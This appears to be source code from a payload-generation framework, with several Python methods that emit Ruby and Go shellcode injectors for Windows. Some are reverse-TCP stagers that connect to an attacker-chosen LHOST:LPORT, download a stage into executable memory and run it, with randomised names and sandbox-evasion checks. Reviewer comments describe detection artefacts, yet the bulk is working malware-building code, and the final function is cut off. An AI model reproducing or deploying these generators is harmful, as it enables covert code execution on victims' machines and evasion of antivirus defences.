def generate(self): payload_code = "require 'rubygems';require 'win32/api';require 'socket';include Win32\n" # Add logic for adding this line, stupid bug and I have no idea # why this is even a problem, but ruby is dumb if self.required_options["HOSTNAME"][0] != "X" or self.required_options[ "DOMAIN"][0] != "X" or self.required_options["USERNAME"][ 0] != "X" or self.required_options["SLEEP"][0] != "X": pass else: payload_code += "exit if Object.const_defined?(:Ocra)\n" if self.required_options["HOSTNAME"][ 0] != "X" or self.required_options["DOMAIN"][0] != "X": payload_code += 'require \'socket\'\n' payload_code2, num_ends_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # randomly generate out variable names payloadName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() threadName = evasion_helpers.randomString() valloc_random = evasion_helpers.randomString() rtlmove_random = evasion_helpers.randomString() createthread_random = evasion_helpers.randomString() waitfor_random = evasion_helpers.randomString() heapcreate_random = evasion_helpers.randomString() heapalloc_random = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code 
+= "$g_o = API.new('_get_osfhandle', 'I', 'I', 'msvcrt.dll')\n" payload_code += "def g(ip,port)\n" payload_code += "\tbegin\n" payload_code += "\t\ts = TCPSocket.open(ip, port)\n" payload_code += "\t\tpl = Integer(s.recv(4).unpack('L')[0])\n" payload_code += "\t\tp = \" \"\n" payload_code += "\t\twhile p.length < pl\n\t\tp += s.recv(pl) end\n" payload_code += "\t\tp[0] = ['BF'].pack(\"H*\")\n" payload_code += "\t\tsd = $g_o.call(s.fileno)\n" payload_code += "\t\tfor i in 1..4\n\t\t\tp[i] = Array(sd).pack('V')[i-1] end\n" payload_code += "\t\treturn p\n" payload_code += "\trescue\n\treturn \"\"\n\tend\nend\n" payload_code += "def ij(sc)\n" payload_code += "\tif sc.length > 1000\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? sc.length : 0x1000), 0)\n" payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n" payload_code += "\tend\nend\n" payload_code += "ij(g(\"%s\",%s))\n" % ( self.required_options["LHOST"][0], self.required_options["LPORT"][0]) # Close out all the if statements for iteration in range(num_ends_required): payload_code += 'end\n' self.payload_source_code = payload_code return
# generate(self) -> None   (Ruby shellcode inject, shellcode embedded as base64)
#
# Builds Ruby source into self.payload_source_code; returns None.
#  - Preamble: require rubygems / win32/api, include Win32, and
#    `exit if Object.const_defined?(:Ocra)` when HOSTNAME, DOMAIN, USERNAME
#    and SLEEP are all "X" (upper-case sentinel compared verbatim). The
#    author's comment describes the Ocra line as a workaround.
#  - Shellcode: from self.shellcode.generate(self.cli_opts) (which also sets
#    self.payload_type to msfvenompayload / payload_choice / 'custom') or
#    from self.cli_shellcode, then base64-encoded as latin-1 text. It is the
#    escaped text form ("\x41\x42...") that is encoded, not raw bytes: the
#    emitted Ruby does unpack("m")[0] (base64 decode), then delete("\\x")
#    (strip backslashes and 'x'), then pack("H*") to turn the hex digits
#    into bytes.
#  - Guard text and the `end` count come from gamemaker.senecas_games(self).
#    The first set of payloadName / ptrName / heap_name random names and the
#    initial num_ends_required = 0 are overwritten a few statements later by
#    the second set; only threadName survives from the first set.
#  - `require 'base64'` precedes the API bindings. Unlike the stager
#    generators, bindings here are plain locals (no `$` prefix).
#    "virtual": VirtualAlloc/RtlMoveMemory/CreateThread/WaitForSingleObject
#    via API.new, decode the literal, VirtualAlloc(0, max(len, 0x1000),
#    0x1000, 0x40). "heap": HeapCreate/HeapAlloc plus the same three, decode
#    the literal, HeapCreate(0x0004, max(len, 0x1000), 0), HeapAlloc(heap,
#    0x00000008, len).
#  - The final "x = RtlMoveMemory.call(...); <thread> = CreateThread.call(...);
#    x = WaitForSingleObject.call(<thread>, 0xFFFFFFF)" line: with the
#    original indentation lost in this listing it is not certain whether it
#    belongs to the heap branch only or follows both branches - confirm
#    against the upstream file before reading the virtual path as complete.
#  - One `end` per num_ends_required closes the guards.
#
# NOTE(review): the whole stage sits in the script as one base64 literal, and
# the API name strings and allocation constants are fixed; only identifiers
# are randomised between samples. The timeout literal is 0xFFFFFFF (seven
# Fs), as in the other Ruby generators.
def generate(self): # How I'm tracking the number of nested tabs needed # to make the payload num_ends_required = 0 payload_code = '' # randomly generate out variable names payloadName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() threadName = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() payload_code = "require 'rubygems'\n" payload_code += "require 'win32/api'\n" payload_code += "include Win32\n" # Add logic for adding this line, stupid bug and I have no idea # why this is even a problem, but ruby is dumb if self.required_options["HOSTNAME"][0] != "X" or self.required_options[ "DOMAIN"][0] != "X" or self.required_options["USERNAME"][ 0] != "X" or self.required_options["SLEEP"][0] != "X": pass else: payload_code += "exit if Object.const_defined?(:Ocra)\n" # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Base64 Encode Shellcode Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') payload_code2, num_ends_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # randomly generate out variable names payloadName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() valloc_random = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() heapcreate_random = evasion_helpers.randomString() heapalloc_random = evasion_helpers.randomString() rtlmove_random = evasion_helpers.randomString() createthread_random = evasion_helpers.randomString() waitfor_random = evasion_helpers.randomString() payload_code += "require 'base64'\n" if self.required_options["INJECT_METHOD"][0].lower() == 
"virtual": payload_code += valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += payloadName + " = [\"" + Shellcode + "\".unpack(\"m\")[0].delete(\"\\\\\\\\x\")].pack(\"H*\")\n" payload_code += ptrName + " = " + valloc_random + ".call(0,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0x1000, 0x40)\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += heapcreate_random + " = API.new('HeapCreate', 'III', 'I');" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += payloadName + " = [\"" + Shellcode + "\".unpack(\"m\")[0].delete(\"\\\\\\\\x\")].pack(\"H*\")\n" payload_code += heap_name + " = " + heapcreate_random + ".call(0x0004,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0)\n" payload_code += ptrName + " = " + heapalloc_random + ".call(" + heap_name + ", 0x00000008, " + payloadName + ".length)\n" payload_code += "x = " + rtlmove_random + ".call(" + ptrName + "," + payloadName + "," + payloadName + ".length); " + threadName + " = " + createthread_random + ".call(0,0," + ptrName + ",0,0,0); x = " + waitfor_random + ".call(" + threadName + ",0xFFFFFFF)\n" # Close out all the if statements for iteration in range(num_ends_required): payload_code += 'end\n' self.payload_source_code = payload_code return
def generate(self):
    """Build a Go reverse-TCP stager and store it in ``self.payload_source_code``.

    The emitted program connects to LHOST:LPORT over TCP, reads a 4-byte
    little-endian length, receives that many bytes, copies them into memory
    obtained from a generated allocator (VirtualAlloc or a private heap,
    selected by INJECT_METHOD) behind a 5-byte prefix, and transfers control
    to that buffer. Sandbox checks from gamemaker are inserted at the top of
    ``main``. Reads ``self.required_options``; returns None.
    """
    # Random identifiers for the emitted Go source.
    memCommit = evasion_helpers.randomString()
    memReserve = evasion_helpers.randomString()
    pageExecRW = evasion_helpers.randomString()
    kernel32 = evasion_helpers.randomString()
    procVirtualAlloc = evasion_helpers.randomString()
    size = evasion_helpers.randomString()
    err = evasion_helpers.randomString()
    wsadata = evasion_helpers.randomString()
    # Shadows the stdlib module name in this scope; it is only a string here.
    socket = evasion_helpers.randomString()
    socketAddr = evasion_helpers.randomString()
    # LHOST is split on '.' and spliced into a [4]byte literal, so only a
    # dotted-quad IPv4 address works here.
    ip = self.required_options["LHOST"][0].split('.')
    buf = evasion_helpers.randomString()
    dataBuf = evasion_helpers.randomString()
    flags = evasion_helpers.randomString()
    qty = evasion_helpers.randomString()
    scLength = evasion_helpers.randomString()
    sc = evasion_helpers.randomString()
    sc2 = evasion_helpers.randomString()
    total = evasion_helpers.randomString()
    mem = evasion_helpers.randomString()
    buffer_variable = evasion_helpers.randomString()
    handle = evasion_helpers.randomString()
    x = evasion_helpers.randomString()
    value = evasion_helpers.randomString()
    cust_func = evasion_helpers.randomString()
    heapcreatevariable = evasion_helpers.randomString()
    heapallocvariable = evasion_helpers.randomString()
    heapcreateout = evasion_helpers.randomString()
    allocvarout = evasion_helpers.randomString()
    errorvariable = evasion_helpers.randomString()
    errorvariabledos = evasion_helpers.randomString()
    constSize = evasion_helpers.randomString()

    # Sandbox check code; num_curlys is how many '{' blocks it left open.
    sandbox_checks, num_curlys = gamemaker.senecas_games(self)

    payload_code = "package main\nimport (\n\"encoding/binary\"\n\"syscall\"\n\"unsafe\"\n"
    if self.required_options["PROCESSORS"][0].lower() != "x":
        payload_code += "\"runtime\"\n"

    # Add in other imports based on the checks being performed; the
    # substring tests avoid emitting the same import twice.
    if self.required_options["USERNAME"][0].lower() != "x":
        payload_code += "\"strings\"\n\"os/user\"\n"
    if self.required_options["HOSTNAME"][0].lower(
    ) != "x" or self.required_options["PROCCHECK"][0].lower() != 'false':
        if "strings" not in payload_code:
            payload_code += "\"strings\"\n"
    if self.required_options["SLEEP"][0].lower() != "x":
        payload_code += "\"net\"\n\"time\"\n\"encoding/binary\"\n"
    if self.required_options["BADMACS"][0].lower() != 'false':
        if "net" not in payload_code:
            payload_code += "\"net\"\n"
        if "strings" not in payload_code:
            payload_code += "\"strings\"\n"
    if self.required_options["UTCCHECK"][0].lower() != 'false':
        if "time" not in payload_code:
            payload_code += "\"time\"\n"
    if self.required_options["CURSORCHECK"][0].lower() != 'false':
        if "time" not in payload_code:
            payload_code += "\"time\"\n"
    payload_code += ")\n"

    # 0x1000 = MEM_COMMIT, 0x2000 = MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    # Detection note: the "virtual" allocator below therefore hands back RWX
    # memory that is immediately filled from the network and executed.
    payload_code += "const (\n"
    payload_code += "%s = 0x1000\n" % (memCommit)
    payload_code += "%s = 0x2000\n" % (memReserve)
    payload_code += "%s = 0x40\n)\n" % (pageExecRW)
    payload_code += "var (\n"

    # Emit a helper ``cust_func(size) (uintptr, error)`` that returns the
    # address of an executable buffer, backed by VirtualAlloc or by
    # HeapCreate(0x00040000 = HEAP_CREATE_ENABLE_EXECUTE) + HeapAlloc.
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" % (
            kernel32)
        payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n)\n" % (
            procVirtualAlloc, kernel32)
        payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (
            cust_func, size)
        payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" % (
            allocvarout, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW)
        payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (
            allocvarout, err, allocvarout)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n"
        payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n"
        payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n"
        payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (
            cust_func, size)
        payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
        payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n"
        payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (
            allocvarout, err, allocvarout)

    payload_code += "func main() {\n"

    # Sandbox code goes here, before any network activity.
    if sandbox_checks != '':
        payload_code += sandbox_checks

    # Network artefact for defenders: Winsock startup, one outbound TCP
    # connection to LHOST:LPORT, a 4-byte little-endian length header, then
    # the stage body read in a loop until scLength bytes have arrived.
    payload_code += "const %s = 1000 << 10\n" % (constSize)
    payload_code += "var %s syscall.WSAData\n" % (wsadata)
    payload_code += "syscall.WSAStartup(uint32(0x202), &%s)\n" % (wsadata)
    payload_code += "%s, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\n" % (
        socket)
    payload_code += "%s := syscall.SockaddrInet4{Port: %s, Addr: [4]byte{%s, %s, %s, %s}}\n" % (
        socketAddr, self.required_options["LPORT"][0], ip[0], ip[1], ip[2], ip[3])
    payload_code += "syscall.Connect(%s, &%s)\n" % (socket, socketAddr)
    payload_code += "var %s [4]byte\n" % (buf)
    payload_code += "%s := syscall.WSABuf{Len: uint32(4), Buf: &%s[0]}\n" % (
        dataBuf, buf)
    payload_code += "%s := uint32(0)\n" % (flags)
    payload_code += "%s := uint32(0)\n" % (qty)
    payload_code += "syscall.WSARecv(%s, &%s, 1, &%s, &%s, nil, nil)\n" % (
        socket, dataBuf, qty, flags)
    payload_code += "%s := binary.LittleEndian.Uint32(%s[:])\n" % (
        scLength, buf)
    payload_code += "%s := make([]byte, %s)\n" % (sc, scLength)
    payload_code += "var %s []byte\n" % (sc2)
    payload_code += "%s = syscall.WSABuf{Len: %s, Buf: &%s[0]}\n" % (
        dataBuf, scLength, sc)
    payload_code += "%s = uint32(0)\n" % (flags)
    payload_code += "%s = uint32(0)\n" % (qty)
    payload_code += "%s := uint32(0)\n" % (total)
    payload_code += "for %s < %s {\n" % (total, scLength)
    payload_code += "syscall.WSARecv(%s, &%s, 1, &%s, &%s, nil, nil)\n" % (
        socket, dataBuf, qty, flags)
    payload_code += "for i := 0; i < int(%s); i++ {\n" % (qty)
    payload_code += "%s = append(%s, %s[i])\n}\n%s += %s\n}\n" % (
        sc2, sc2, sc, total, qty)
    # Allocate scLength + 5 bytes: a 5-byte prefix (0xBF, the low byte of the
    # socket handle, three zero bytes) followed by the received stage, then
    # transfer control to the buffer.
    payload_code += "%s, _ := %s(uintptr(%s + 5))\n" % (mem, cust_func, scLength)
    payload_code += "%s := (*[%s]byte)(unsafe.Pointer(%s))\n" % (
        buffer_variable, constSize, mem)
    payload_code += "%s := (uintptr)(unsafe.Pointer(%s))\n" % (handle, socket)
    payload_code += "%s[0] = 0xBF\n" % (buffer_variable)
    payload_code += "%s[1] = byte(%s)\n" % (buffer_variable, handle)
    payload_code += "%s[2] = 0x00\n" % (buffer_variable)
    payload_code += "%s[3] = 0x00\n" % (buffer_variable)
    payload_code += "%s[4] = 0x00\n" % (buffer_variable)
    payload_code += "for %s, %s := range %s {\n" % (x, value, sc2)
    payload_code += "%s[%s+5] = %s\n}\n" % (buffer_variable, x, value)
    payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (mem)
    # Close the blocks opened by the sandbox checks.
    payload_code += '}' * num_curlys

    self.payload_source_code = payload_code
    return
def generate(self):
    """Build a Ruby (win32/api) shellcode-injection stub with the shellcode
    embedded as a plain Ruby string literal.

    Reads ``self.required_options`` (EXPIRE_PAYLOAD, HOSTNAME, DOMAIN,
    USERNAME, INJECT_METHOD), ``self.cli_shellcode`` / ``self.shellcode`` /
    ``self.cli_opts``; sets ``self.payload_type`` and stores the result in
    ``self.payload_source_code``. Returns None.
    """
    payload_code = "require 'rubygems'\n"
    payload_code += "require 'win32/api'\n"
    payload_code += "include Win32\n"

    # The Ocra guard is emitted only when none of the check options are set.
    # The original author recorded this as a workaround for an Ocra build
    # problem whose cause was never identified.
    if self.required_options["EXPIRE_PAYLOAD"][
            0] != "X" or self.required_options["HOSTNAME"][
            0] != "X" or self.required_options["DOMAIN"][
            0] != "X" or self.required_options["USERNAME"][
            0] != "X":
        pass
    else:
        payload_code += "exit if Object.const_defined?(:Ocra)\n"

    # Shellcode comes from the configured generator unless it was supplied
    # on the command line; payload_type records which source produced it.
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ''
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode

    # NOTE(review): this rebinds payload_code rather than appending, so the
    # require/include/Ocra lines built above are not part of the output.
    payload_code, num_ends_required = gamemaker.senecas_games(self)

    # Random identifiers for the emitted Ruby.
    payloadName = evasion_helpers.randomString()
    ptrName = evasion_helpers.randomString()
    threadName = evasion_helpers.randomString()
    heap_name = evasion_helpers.randomString()
    valloc_random = evasion_helpers.randomString()
    rtlmove_random = evasion_helpers.randomString()
    createthread_random = evasion_helpers.randomString()
    waitfor_random = evasion_helpers.randomString()
    heapcreate_random = evasion_helpers.randomString()
    heapalloc_random = evasion_helpers.randomString()

    # Detection note: same API sequence as the other Ruby variant --
    # VirtualAlloc(0x1000 | 0x40, i.e. MEM_COMMIT + PAGE_EXECUTE_READWRITE)
    # or HeapCreate/HeapAlloc, then RtlMoveMemory, CreateThread and
    # WaitForSingleObject, all resolved through win32/api at run time.
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
        # Shellcode is interpolated verbatim into a double-quoted Ruby string.
        payload_code += "%s = \"%s\"\n" % (payloadName, Shellcode)
        # Allocation size is at least one page (0x1000).
        payload_code += ptrName + " = " + valloc_random + ".call(0,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0x1000, 0x40)\n"
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += heapcreate_random + " = API.new('HeapCreate', 'III', 'I');" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
        payload_code += "%s = \"%s\"\n" % (payloadName, Shellcode)
        # Private heap, then HeapAlloc with 0x00000008 (HEAP_ZERO_MEMORY).
        payload_code += heap_name + " = " + heapcreate_random + ".call(0x0004,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0)\n"
        payload_code += ptrName + " = " + heapalloc_random + ".call(" + heap_name + ", 0x00000008, " + payloadName + ".length)\n"
    # Shared tail for both methods: copy, start a thread at ptrName, wait on it.
    payload_code += "x = " + rtlmove_random + ".call(" + ptrName + "," + payloadName + "," + payloadName + ".length); " + threadName + " = " + createthread_random + ".call(0,0," + ptrName + ",0,0,0); x = " + waitfor_random + ".call(" + threadName + ",0xFFFFFFF)\n"

    # Close out all the if statements opened by the sandbox checks.
    for iteration in range(num_ends_required):
        payload_code += 'end\n'

    self.payload_source_code = payload_code
    return
def generate(self):
    """Build a Go shellcode-injection program and store it in
    ``self.payload_source_code``.

    The shellcode is embedded as a Go string constant. INJECT_METHOD selects
    the allocator: "virtual" allocates PAGE_READWRITE memory, copies the bytes
    in and flips the region to PAGE_EXECUTE_READ with VirtualProtect; "heap"
    uses an executable private heap. Sandbox checks from gamemaker are
    inserted at the top of ``main``. Reads ``self.required_options``,
    ``self.cli_shellcode`` / ``self.shellcode`` / ``self.cli_opts``; sets
    ``self.payload_type``; returns None.
    """
    # Random identifiers for the emitted Go source.
    memCommit = evasion_helpers.randomString()
    memReserve = evasion_helpers.randomString()
    pageExecRW = evasion_helpers.randomString()
    kernel32 = evasion_helpers.randomString()
    procVirtualAlloc = evasion_helpers.randomString()
    cust_func = evasion_helpers.randomString()
    size = evasion_helpers.randomString()
    addr = evasion_helpers.randomString()
    err = evasion_helpers.randomString()
    shellcode_variable = evasion_helpers.randomString()
    buff = evasion_helpers.randomString()
    value = evasion_helpers.randomString()
    heapcreatevariable = evasion_helpers.randomString()
    heapallocvariable = evasion_helpers.randomString()
    heapcreateout = evasion_helpers.randomString()
    errorvariable = evasion_helpers.randomString()
    heapallocout = evasion_helpers.randomString()
    rand_var = evasion_helpers.randomString()
    procVirtualProtect = evasion_helpers.randomString()
    proc_out = evasion_helpers.randomString()
    vprotectendvar = evasion_helpers.randomString()

    # Shellcode comes from the configured generator unless it was supplied
    # on the command line; payload_type records which source produced it.
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ''
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode

    # Sandbox check code; num_curlys is how many '{' blocks it left open.
    sandbox_checks, num_curlys = gamemaker.senecas_games(self)

    payload_code = "package main\nimport (\n\"syscall\"\n\"unsafe\"\n\"fmt\"\n\"os\"\n"
    if self.required_options["PROCESSORS"][0].lower() != "x":
        payload_code += "\"runtime\"\n"

    # Add in other imports based on the checks being performed; the
    # substring tests avoid emitting the same import twice.
    if self.required_options["USERNAME"][0].lower() != "x":
        payload_code += "\"strings\"\n\"os/user\"\n"
    if self.required_options["HOSTNAME"][0].lower(
    ) != "x" or self.required_options["PROCCHECK"][0].lower() != 'false':
        if "strings" not in payload_code:
            payload_code += "\"strings\"\n"
    if self.required_options["SLEEP"][0].lower() != "x":
        payload_code += "\"net\"\n\"time\"\n\"encoding/binary\"\n"
    if self.required_options["BADMACS"][0].lower() != 'false':
        if "net" not in payload_code:
            payload_code += "\"net\"\n"
        if "strings" not in payload_code:
            payload_code += "\"strings\"\n"
    if self.required_options["UTCCHECK"][0].lower() != 'false':
        if "time" not in payload_code:
            payload_code += "\"time\"\n"
    if self.required_options["CURSORCHECK"][0].lower() != 'false':
        if "time" not in payload_code:
            payload_code += "\"time\"\n"
    payload_code += ")\n"

    # Constants for the "virtual" path only: 0x1000 = MEM_COMMIT,
    # 0x2000 = MEM_RESERVE, 0x04 = PAGE_READWRITE (despite the variable's name,
    # the initial allocation is not executable).
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += "const (\n"
        payload_code += "%s = 0x1000\n" % (memCommit)
        payload_code += "%s = 0x2000\n" % (memReserve)
        payload_code += "%s = 0x04\n)\n" % (pageExecRW)

    payload_code += "var (\n"

    # Emit a helper ``cust_func(size) (uintptr, error)`` that returns the
    # address of the destination buffer. The heap path uses
    # HeapCreate(0x00040000 = HEAP_CREATE_ENABLE_EXECUTE) and
    # HeapAlloc(..., 0x00000008 = HEAP_ZERO_MEMORY, ...).
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += "%s = 0\n" % (proc_out)
        payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" % (
            kernel32)
        payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n" % (
            procVirtualAlloc, kernel32)
        payload_code += "%s = %s.NewProc(\"VirtualProtect\")\n)\n" % (
            procVirtualProtect, kernel32)
        payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (
            cust_func, size)
        payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" % (
            addr, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW)
        payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (
            addr, err, addr)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n"
        payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n"
        payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n"
        payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (
            cust_func, size)
        payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
        payload_code += heapallocout + ", _, _ := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n"
        payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (
            heapallocout, errorvariable, heapallocout)

    # The shellcode text is interpolated verbatim into a Go string literal.
    payload_code += "var %s string = \"%s\"\n" % (shellcode_variable, Shellcode)
    payload_code += "func main() {\n"

    # Sandbox code goes here, before any allocation.
    if sandbox_checks != '':
        payload_code += sandbox_checks

    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += "%s, %s := %s(uintptr(len(%s)))\n" % (
            addr, err, cust_func, shellcode_variable)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += "%s, %s := %s(uintptr(len(%s)))\n" % (
            heapallocout, err, cust_func, shellcode_variable)
    payload_code += "if %s != nil {\nfmt.Println(%s)\nos.Exit(1)\n}\n" % (
        err, err)

    # Copy the bytes into the buffer through a fixed-size array view.
    # Detection note ("virtual" path): after the copy, VirtualProtect changes
    # the region to 0x20 (PAGE_EXECUTE_READ) -- the RW -> RX transition on a
    # freshly allocated private region is the behaviour to correlate, since
    # no RWX allocation ever occurs.
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" % (
            buff, addr)
        payload_code += "var %s uintptr\n" % (proc_out)
        payload_code += "var %s uintptr\n" % (vprotectendvar)
        payload_code += "for " + rand_var + ", %s := range []byte(%s) {\n" % (
            value, shellcode_variable)
        payload_code += buff + "[" + rand_var + "] = %s\n}\n" % (value)
        payload_code += "%s, _, %s = %s.Call(%s, uintptr(len(%s)), 0x20, uintptr(unsafe.Pointer(&%s)))\n" % (
            proc_out, err, procVirtualProtect, addr, shellcode_variable, vprotectendvar)
        payload_code += "if %s == 0 {\nos.Exit(1)\n}\n" % (proc_out)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" % (
            buff, heapallocout)
        payload_code += "for " + rand_var + ", %s := range []byte(%s) {\n" % (
            value, shellcode_variable)
        payload_code += buff + "[" + rand_var + "] = %s\n}\n" % (value)

    # Transfer control to the buffer and close main.
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (addr)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (
            heapallocout)

    # Close the blocks opened by the sandbox checks.
    payload_code += '}' * num_curlys

    self.payload_source_code = payload_code
    return
def generate(self):
    """Build a Python (ctypes) shellcode-injection script with inline
    environment checks and store it in ``self.payload_source_code``.

    Unlike the siblings that delegate to gamemaker, this variant emits its
    own EXPIRE_PAYLOAD / HOSTNAME / DOMAIN / PROCESSORS / USERNAME checks,
    nesting the injection code one tab deeper per check. INJECT_METHOD selects
    VirtualAlloc or HeapCreate/HeapAlloc; USE_PYHERION optionally
    post-processes the result with ``encryption.pyherion``. Reads
    ``self.required_options``, ``self.cli_shellcode`` / ``self.shellcode`` /
    ``self.cli_opts``; sets ``self.payload_type``; returns None.
    """
    # Shellcode comes from the configured generator unless it was supplied
    # on the command line; payload_type records which source produced it.
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
